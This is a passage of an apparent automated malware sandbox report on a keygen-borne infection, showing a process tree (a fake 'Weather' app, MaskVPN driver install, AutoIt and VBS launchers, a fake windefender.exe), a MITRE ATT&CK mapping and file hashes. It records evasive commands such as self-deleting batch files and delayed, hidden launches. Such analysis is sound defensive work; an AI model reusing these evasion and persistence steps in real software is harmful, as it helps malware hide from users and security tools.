                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1820,177586632822513674,15622691182948822665,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4904_210696988" --mojo-platform-channel-handle=1900 /prefetch:8
                                                                                                                            5⤵
                                                                                                                              PID:4848
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1820,177586632822513674,15622691182948822665,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4904_210696988" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1852 /prefetch:2
                                                                                                                              5⤵
                                                                                                                                PID:4264
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1820,177586632822513674,15622691182948822665,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4904_210696988" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2468 /prefetch:1
                                                                                                                                5⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                PID:5416
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,177586632822513674,15622691182948822665,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4904_210696988" --mojo-platform-channel-handle=3296 /prefetch:8
                                                                                                                                5⤵
                                                                                                                                  PID:6292
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1820,177586632822513674,15622691182948822665,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4904_210696988" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1852 /prefetch:2
                                                                                                                                  5⤵
                                                                                                                                    PID:5696
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,177586632822513674,15622691182948822665,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4904_210696988" --mojo-platform-channel-handle=2888 /prefetch:8
                                                                                                                                    5⤵
                                                                                                                                      PID:5912
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,177586632822513674,15622691182948822665,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4904_210696988" --mojo-platform-channel-handle=2180 /prefetch:8
                                                                                                                                      5⤵
                                                                                                                                        PID:744
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,177586632822513674,15622691182948822665,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4904_210696988" --mojo-platform-channel-handle=1600 /prefetch:8
                                                                                                                                        5⤵
                                                                                                                                          PID:212
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,177586632822513674,15622691182948822665,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4904_210696988" --mojo-platform-channel-handle=3504 /prefetch:8
                                                                                                                                          5⤵
                                                                                                                                            PID:7160
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1820,177586632822513674,15622691182948822665,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4904_210696988" --mojo-platform-channel-handle=2420 /prefetch:8
                                                                                                                                            5⤵
                                                                                                                                              PID:4708
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE8B74.bat" "
                                                                                                                                          3⤵
                                                                                                                                            PID:6784
                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                              C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
                                                                                                                                              4⤵
                                                                                                                                              • Views/modifies file attributes
                                                                                                                                              PID:4756
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              C:\Windows\System32\timeout.exe 5
                                                                                                                                              4⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:4840
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              C:\Windows\System32\timeout.exe 5
                                                                                                                                              4⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:5008
                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                              C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE8B74.bat"
                                                                                                                                              4⤵
                                                                                                                                              • Views/modifies file attributes
                                                                                                                                              PID:6620
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE8B74.bat" "
                                                                                                                                              4⤵
                                                                                                                                                PID:304
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                4⤵
                                                                                                                                                  PID:5440
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE8B63.bat" "
                                                                                                                                                3⤵
                                                                                                                                                  PID:3632
                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                    C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
                                                                                                                                                    4⤵
                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                    PID:7032
                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                    C:\Windows\System32\timeout.exe 5
                                                                                                                                                    4⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:5744
                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                    C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE8B63.bat"
                                                                                                                                                    4⤵
                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                    PID:5568
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE8B63.bat" "
                                                                                                                                                    4⤵
                                                                                                                                                      PID:6124
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:7084
                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                  1⤵
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:4388
                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                  1⤵
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  PID:4276
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                  1⤵
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                  PID:2032
                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                    DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{67734e91-4cc0-6848-a1ff-d63c8cb03e0d}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:5448
                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                    DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    PID:4580
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5500
                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5880
                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                      1⤵
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      PID:6564
                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                      1⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:6776
                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                        MaskVPNUpdate.exe /silent
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:6860
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Disk\AutoIt3\AutoIt3_x64.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Disk\AutoIt3\AutoIt3_x64.exe "C:\Users\Admin\AppData\Local\Disk\AutoIt3\Settings.au3"
                                                                                                                                                      1⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:940
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Disk\Packages\Active.vbs"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4608
                                                                                                                                                          • C:\Windows\System32\WScript.exe
                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Disk\Packages\Active.vbs"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:6628
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Disk\Packages\Active.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Disk\Packages\Active.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5320
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Disk\Packages\Active.vbs"
                                                                                                                                                              2⤵
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              PID:5956
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4896
                                                                                                                                                                • C:\Windows\System32\WScript.exe
                                                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Disk\Packages\Active.vbs"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4500
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Disk\Packages\Active.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Disk\Packages\Active.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4068
                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                  PID:1976
                                                                                                                                                                • C:\Windows\windefender.exe
                                                                                                                                                                  C:\Windows\windefender.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5968
                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4960

                                                                                                                                                                    Network

                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                    Execution

                                                                                                                                                                    Command-Line Interface

                                                                                                                                                                    1
                                                                                                                                                                    T1059

                                                                                                                                                                    Scheduled Task

                                                                                                                                                                    1
                                                                                                                                                                    T1053

                                                                                                                                                                    Persistence

                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                    1
                                                                                                                                                                    T1031

                                                                                                                                                                    Hidden Files and Directories

                                                                                                                                                                    2
                                                                                                                                                                    T1158

                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                    2
                                                                                                                                                                    T1060

                                                                                                                                                                    Scheduled Task

                                                                                                                                                                    1
                                                                                                                                                                    T1053

                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                    Scheduled Task

                                                                                                                                                                    1
                                                                                                                                                                    T1053

                                                                                                                                                                    Defense Evasion

                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                    2
                                                                                                                                                                    T1089

                                                                                                                                                                    Modify Registry

                                                                                                                                                                    6
                                                                                                                                                                    T1112

                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                    2
                                                                                                                                                                    T1497

                                                                                                                                                                    Impair Defenses

                                                                                                                                                                    1
                                                                                                                                                                    T1562

                                                                                                                                                                    Hidden Files and Directories

                                                                                                                                                                    2
                                                                                                                                                                    T1158

                                                                                                                                                                    File Permissions Modification

                                                                                                                                                                    1
                                                                                                                                                                    T1222

                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                    1
                                                                                                                                                                    T1130

                                                                                                                                                                    Credential Access

                                                                                                                                                                    Credentials in Files

                                                                                                                                                                    5
                                                                                                                                                                    T1081

                                                                                                                                                                    Discovery

                                                                                                                                                                    Software Discovery

                                                                                                                                                                    1
                                                                                                                                                                    T1518

                                                                                                                                                                    Query Registry

                                                                                                                                                                    9
                                                                                                                                                                    T1012

                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                    2
                                                                                                                                                                    T1497

                                                                                                                                                                    System Information Discovery

                                                                                                                                                                    7
                                                                                                                                                                    T1082

                                                                                                                                                                    Security Software Discovery

                                                                                                                                                                    1
                                                                                                                                                                    T1063

                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                    3
                                                                                                                                                                    T1120

                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                    1
                                                                                                                                                                    T1018

                                                                                                                                                                    Collection

                                                                                                                                                                    Data from Local System

                                                                                                                                                                    5
                                                                                                                                                                    T1005

                                                                                                                                                                    Command and Control

                                                                                                                                                                    Web Service

                                                                                                                                                                    1
                                                                                                                                                                    T1102

                                                                                                                                                                    Replay Monitor

                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                    Downloads

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\multitimer.exe.log
                                                                                                                                                                      MD5

                                                                                                                                                                      fa65eca2a4aba58889fe1ec275a058a8

                                                                                                                                                                      SHA1

                                                                                                                                                                      0ecb3c6e40de54509d93570e58e849e71194557a

                                                                                                                                                                      SHA256

                                                                                                                                                                      95e69d66188dd8287589817851941e167b0193638f4a7225c73ffbd3913c0c2e

                                                                                                                                                                      SHA512

                                                                                                                                                                      916899c5bfc2d1bef93ab0bf80a7db44b59a132c64fa4d6ab3f7d786ad857b747017aab4060e5a9a77775587700b2ac597c842230172a97544d82521bfc36dff

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1izm4jaltpz\vict.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      f025c62c833d90189c060be4b91f047c

                                                                                                                                                                      SHA1

                                                                                                                                                                      6f2c578f970c0597de4507c2392c2f9441695a5e

                                                                                                                                                                      SHA256

                                                                                                                                                                      081cfdc8777641fda16c7abf8a62509df260e143d3b26207b44fdc84e919c214

                                                                                                                                                                      SHA512

                                                                                                                                                                      46efa66d637e997ec851805207af9c1357be044880c8f090c20fceceed5a3af0511a93151f65b502764e8a2fd8c4b75afc1a3bf6bd60c7eff03637cac884cdb9

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1izm4jaltpz\vict.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      f025c62c833d90189c060be4b91f047c

                                                                                                                                                                      SHA1

                                                                                                                                                                      6f2c578f970c0597de4507c2392c2f9441695a5e

                                                                                                                                                                      SHA256

                                                                                                                                                                      081cfdc8777641fda16c7abf8a62509df260e143d3b26207b44fdc84e919c214

                                                                                                                                                                      SHA512

                                                                                                                                                                      46efa66d637e997ec851805207af9c1357be044880c8f090c20fceceed5a3af0511a93151f65b502764e8a2fd8c4b75afc1a3bf6bd60c7eff03637cac884cdb9

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5bw5yk4xihc\vpn.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      a9487e1960820eb2ba0019491d3b08ce

                                                                                                                                                                      SHA1

                                                                                                                                                                      349b4568ddf57b5c6c1e4a715b27029b287b3b4a

                                                                                                                                                                      SHA256

                                                                                                                                                                      123c95cf9e3813be75fe6d337b6a66f8c06898ae2d4b0b3e69e2e14954ff4776

                                                                                                                                                                      SHA512

                                                                                                                                                                      dab78aff75017f039f7fee67f3967ba9dd468430f9f1ecffde07de70964131931208ee6dd97a19399d5f44d3ab8b5d21abcd3d2766b1caaf970e1bd1d69ae0dc

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5bw5yk4xihc\vpn.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      a9487e1960820eb2ba0019491d3b08ce

                                                                                                                                                                      SHA1

                                                                                                                                                                      349b4568ddf57b5c6c1e4a715b27029b287b3b4a

                                                                                                                                                                      SHA256

                                                                                                                                                                      123c95cf9e3813be75fe6d337b6a66f8c06898ae2d4b0b3e69e2e14954ff4776

                                                                                                                                                                      SHA512

                                                                                                                                                                      dab78aff75017f039f7fee67f3967ba9dd468430f9f1ecffde07de70964131931208ee6dd97a19399d5f44d3ab8b5d21abcd3d2766b1caaf970e1bd1d69ae0dc

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5t2kifefote\AwesomePoolU1.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      e8d6b509383ba10886ded570ec61ad48

                                                                                                                                                                      SHA1

                                                                                                                                                                      43b0fdbc78c1b8ad96aa9b3cc9ae831afbe7d6eb

                                                                                                                                                                      SHA256

                                                                                                                                                                      7ad1c6987ba92daa9d0e84f666c563fb53292b6653538082dd43dad250bbdd70

                                                                                                                                                                      SHA512

                                                                                                                                                                      08d0acaa8b3e1e4b30d75930ce14b2f6229d75e0c5a71e72d9c6507160a61a020bea5abc1f730c7ccb51d6a8e5ea67d6285e4978ba85fe91ec010d8e8d2d27f2

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5t2kifefote\AwesomePoolU1.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      e8d6b509383ba10886ded570ec61ad48

                                                                                                                                                                      SHA1

                                                                                                                                                                      43b0fdbc78c1b8ad96aa9b3cc9ae831afbe7d6eb

                                                                                                                                                                      SHA256

                                                                                                                                                                      7ad1c6987ba92daa9d0e84f666c563fb53292b6653538082dd43dad250bbdd70

                                                                                                                                                                      SHA512

                                                                                                                                                                      08d0acaa8b3e1e4b30d75930ce14b2f6229d75e0c5a71e72d9c6507160a61a020bea5abc1f730c7ccb51d6a8e5ea67d6285e4978ba85fe91ec010d8e8d2d27f2

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IGLVOCZ0VB\multitimer.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      b7d2b7a808558acb762a17e564e0d205

                                                                                                                                                                      SHA1

                                                                                                                                                                      cf1a8d7e9cf9eb57086dd1265fccee3543de5e8b

                                                                                                                                                                      SHA256

                                                                                                                                                                      61aa3edce0b65360f71806d57a34c7c167aaaa14963abb8d57f8eefa9d6627e6

                                                                                                                                                                      SHA512

                                                                                                                                                                      48b5d7dbe9e48295fab8590944749237eeb7d182a0e554eb8adb25c0d5149445f8afda4fe4be87998c629a52a0ee3bb0a52e3aa62407d705dd354a4f21799b07

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IGLVOCZ0VB\multitimer.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      b7d2b7a808558acb762a17e564e0d205

                                                                                                                                                                      SHA1

                                                                                                                                                                      cf1a8d7e9cf9eb57086dd1265fccee3543de5e8b

                                                                                                                                                                      SHA256

                                                                                                                                                                      61aa3edce0b65360f71806d57a34c7c167aaaa14963abb8d57f8eefa9d6627e6

                                                                                                                                                                      SHA512

                                                                                                                                                                      48b5d7dbe9e48295fab8590944749237eeb7d182a0e554eb8adb25c0d5149445f8afda4fe4be87998c629a52a0ee3bb0a52e3aa62407d705dd354a4f21799b07

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IGLVOCZ0VB\multitimer.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      b7d2b7a808558acb762a17e564e0d205

                                                                                                                                                                      SHA1

                                                                                                                                                                      cf1a8d7e9cf9eb57086dd1265fccee3543de5e8b

                                                                                                                                                                      SHA256

                                                                                                                                                                      61aa3edce0b65360f71806d57a34c7c167aaaa14963abb8d57f8eefa9d6627e6

                                                                                                                                                                      SHA512

                                                                                                                                                                      48b5d7dbe9e48295fab8590944749237eeb7d182a0e554eb8adb25c0d5149445f8afda4fe4be87998c629a52a0ee3bb0a52e3aa62407d705dd354a4f21799b07

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IGLVOCZ0VB\multitimer.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      b7d2b7a808558acb762a17e564e0d205

                                                                                                                                                                      SHA1

                                                                                                                                                                      cf1a8d7e9cf9eb57086dd1265fccee3543de5e8b

                                                                                                                                                                      SHA256

                                                                                                                                                                      61aa3edce0b65360f71806d57a34c7c167aaaa14963abb8d57f8eefa9d6627e6

                                                                                                                                                                      SHA512

                                                                                                                                                                      48b5d7dbe9e48295fab8590944749237eeb7d182a0e554eb8adb25c0d5149445f8afda4fe4be87998c629a52a0ee3bb0a52e3aa62407d705dd354a4f21799b07

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IGLVOCZ0VB\multitimer.exe.config
                                                                                                                                                                      MD5

                                                                                                                                                                      3f1498c07d8713fe5c315db15a2a2cf3

                                                                                                                                                                      SHA1

                                                                                                                                                                      ef5f42fd21f6e72bdc74794f2496884d9c40bbfb

                                                                                                                                                                      SHA256

                                                                                                                                                                      52ca39624f8fd70bc441d055712f115856bc67b37efb860d654e4a8909106dc0

                                                                                                                                                                      SHA512

                                                                                                                                                                      cb32ce5ef72548d1b0d27f3f254f4b67b23a0b662d0ef7ae12f9e3ef1b0a917b098368b434caf54751c02c0f930e92cffd384f105d8d79ee725df4d97a559a3d

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\R8T3AIDM5L\setups.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      cf43b02b0c1baa1c2dade6dc9201d49f

                                                                                                                                                                      SHA1

                                                                                                                                                                      70c0b1008a477591de4d19f05a24211cc0d8284e

                                                                                                                                                                      SHA256

                                                                                                                                                                      60d7b5cac6a1e463d0be9c87a426f1b40ff06227d6ab5f71f6a30b23ba3bd058

                                                                                                                                                                      SHA512

                                                                                                                                                                      85ce05ccc14978c786981b4c858f6bba090094bcb9a9fdc5dc9174673a00f98296811da8df1ee708e8b1e8e98606a2e5baa2a54b228657400cca7498d85513f9

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\R8T3AIDM5L\setups.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      cf43b02b0c1baa1c2dade6dc9201d49f

                                                                                                                                                                      SHA1

                                                                                                                                                                      70c0b1008a477591de4d19f05a24211cc0d8284e

                                                                                                                                                                      SHA256

                                                                                                                                                                      60d7b5cac6a1e463d0be9c87a426f1b40ff06227d6ab5f71f6a30b23ba3bd058

                                                                                                                                                                      SHA512

                                                                                                                                                                      85ce05ccc14978c786981b4c858f6bba090094bcb9a9fdc5dc9174673a00f98296811da8df1ee708e8b1e8e98606a2e5baa2a54b228657400cca7498d85513f9

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                      SHA1

                                                                                                                                                                      a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                      SHA256

                                                                                                                                                                      862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                      SHA512

